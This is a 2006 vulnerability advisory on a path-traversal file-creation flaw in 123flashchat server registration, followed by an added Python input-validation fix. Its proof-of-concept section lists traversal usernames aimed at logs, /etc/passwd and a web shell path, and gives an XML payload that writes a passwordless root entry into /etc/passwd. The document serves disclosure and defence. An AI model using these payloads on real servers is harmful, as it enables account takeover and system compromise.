ISAA-2006-001.txt

21 Jan 2006. Reported by Jesus Olmos Gonzalez. Type: packetstorm. Source: packetstormsecurity.com

Arbitrary remote file creation in the 123flashchat server allows unauthorized users to create, modify, or erase files, compromising system security. Severity: 4/5.

```text
=============================================
INTERNET SECURITY AUDITORS ALERT 2006-001  
- Original release date: January 09, 2006  
- Last revised: January 13, 2006  
- Discovered by: Jesus Olmos Gonzalez  
- Severity: 4/5  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Arbitrary remote file creation in 123flashchat server.  
  
II. BACKGROUND  
-------------------------  
123 Flash Chat is a full-featured Java chat server and Flash chat
client. The product homepage is www.123flashchat.com and it can be
tested at:
  
http://host10.123flaschat.com/123flaschat.swf  
http://www.123flashchat.com/123flashchat.swf  
  
  
III. DESCRIPTION  
-------------------------  
The chat server has a user-registration feature that can be enabled
by the following setting:
  
<enable-user-register>On</enable-user-register>  
  
in /server/etc/groups/default.xml  
  
By default it is enabled and anybody can create a chat account.  
  
  
The registration form asks for the following fields:
username, password, repeat-password and email.
  
When a user creates an account, a file is created in the members directory:
  
/123flashchat/server/data/default/members/isec-user  
  
The user file has the following structure:  
^@^B^@^<username>^@^V<password>^@^E<email>  
or  
^@^B^@^<username>^@^V<password>^@^@  
  
                   allow
field        size  null   parse                     example
username     32    no     (allows traversal ../)    ../room_1.txt
password     32    no     allows all                123
repeat-pass  32    no     allows all                123
email        128   yes    /^.+@.+\..+$/aa           [email protected]
  
  
The username field allows anybody to create a file on the server, with the
same privileges as the server process and almost arbitrary content.

This is dangerous because a user can take over other accounts, erase logs,
modify the server's /etc/passwd or modify other config files.
  
  
IV. PROOF OF CONCEPT  
-------------------------  
In the exploitation there are two factors, WHERE and WHAT.
The username vector is WHERE, and WHAT can be:
1) the password
2) the email address, if more bytes are needed
  
  
Possible attacks:
  
  
../../../../logs/access.log              erase logs.
../../../../logs/error.log               erase logs.
../default/logs/access.log               erase logs.
../members/parker                        change parker's password; if we now
                                         log in as parker, he will be
                                         disconnected.

../../../../../../../etc/passwd          if the server runs as root.
../../../../etc/ssh/sshd.conf            if the server runs as root.
../../../../../var/log/messages          if the server runs as root.
../../../../var/www/htdocs/x.php         try to build a shell.
../../../etc/groups/default.xml          create an admin account or change
                                         other config settings.
../../../fcserver.sh                     try to replace the script.
  
etc.  
  
It is possible to replace existing files to cause a DoS, to erase
logs, to create or change system accounts, to take over other chat user or
admin accounts, or to cause other effects on the server's system.

*Possible* remote execution if some config file is modified.

It is possible to hijack and modify the raw command to inject line
feeds (0x0a) or other characters and so construct arbitrary content for the
created/overwritten file.
  
Example:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<Register email="" passwd="(0x0a)root::0:0:root:/bin/bash(0x0a)"  
user="../../../../../../../etc/passwd" />(0x0a)  
  
/etc/passwd will be:  
  
\0\2\0\3../../../../../../../etc/passwd\0\3  
root::0:0:root:/bin/bash  
\0\0  
  
If the server is Windows, it is possible to get code execution.
  
  
V. BUSINESS IMPACT  
-------------------------  
The chat service can be crashed or compromised remotely.
  
  
VI. SYSTEMS AFFECTED  
-------------------------  
This vulnerability affects the 123flashchat server up to 5.1 (released
on Dec 22, 2005).

Tested on:
123flashchat server 5.1
123flashchat server 5.0
  
  
VII. SOLUTION  
-------------------------  
The vendor released the 5.1_2 version.  
  
http://www.123flashchat.com/flash-chat-server-v512.html  
  
  
VIII. REFERENCES  
-------------------------  
-  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported by Jesus Olmos  
Gonzalez (jolmos=at=isecauditors=dot=com).  
  
  
X. REVISION HISTORY  
-------------------------  
January 09, 2006: Initial release.  
January 13, 2006: Vendor response update.
  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
January 04, 2006 Vulnerability discovered by Internet Security
Auditors (http://www.isecauditors.com)
January 09, 2006 Initial vendor notification sent.  
January 10, 2006 Quick response, Version 5.1_2 was released.  
  
XII. LEGAL NOTICES  
-------------------------  
-  
```
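The root cause described in section III is that the username is used unchecked as a file name under the members directory, and that the password and email bytes are written into the record unfiltered, so a 0x0a in the password turns the record into a valid line of whatever file the traversal points at. The following Python is an added example of how the registration input should have been handled; it is not the 123flashchat server's code. The members directory path, field sizes and email regex are taken from the advisory; the username allow-list and function names are assumptions.

```python
import os
import re

# Constructed hardening example for the ISAA-2006-001 registration flaw;
# not code from 123flashchat. Path and sizes are taken from the advisory.
MEMBERS_DIR = "/123flashchat/server/data/default/members"
MAX_LEN = {"username": 32, "password": 32, "email": 128}

USERNAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")   # assumed allow-list: no '/', '.', NUL
EMAIL_RE = re.compile(r"^.+@.+\..+$")                # the regex quoted in the advisory
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")          # NUL, LF, CR and other control bytes


def member_path(username: str, members_dir: str = MEMBERS_DIR) -> str:
    """Resolve the member file for `username`; refuse anything outside members_dir."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains characters outside the allow-list")
    base = os.path.realpath(members_dir)
    target = os.path.realpath(os.path.join(base, username))
    # Independent second check: even if the allow-list is loosened later, the
    # resolved path must stay a direct child of the members directory, which
    # defeats '../room_1.txt', '../members/parker' and '../../../etc/passwd'.
    if os.path.dirname(target) != base:
        raise ValueError("username resolves outside the members directory")
    return target


def validate_registration(username: str, password: str,
                          repeat: str, email: str) -> dict:
    """Return the validated fields plus the file path, or raise ValueError.

    Nothing is written here; the caller writes only after this succeeds.
    """
    fields = {"username": username, "password": password, "email": email}
    for name, value in fields.items():
        if len(value) > MAX_LEN[name]:
            raise ValueError(f"{name} exceeds {MAX_LEN[name]} bytes")
        if CONTROL_RE.search(value):
            # A line feed in the password is what made the member record a
            # well-formed /etc/passwd line in the advisory's example.
            raise ValueError(f"{name} contains control characters")
    if password != repeat:
        raise ValueError("passwords do not match")
    if email and not EMAIL_RE.fullmatch(email):   # email may be empty (null allowed)
        raise ValueError("email is malformed")
    fields["path"] = member_path(username)
    return fields
```

Both checks in `member_path` are deliberate: the allow-list rejects the traversal before any path arithmetic, and the `realpath` comparison catches a bypass if the allow-list is ever relaxed.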
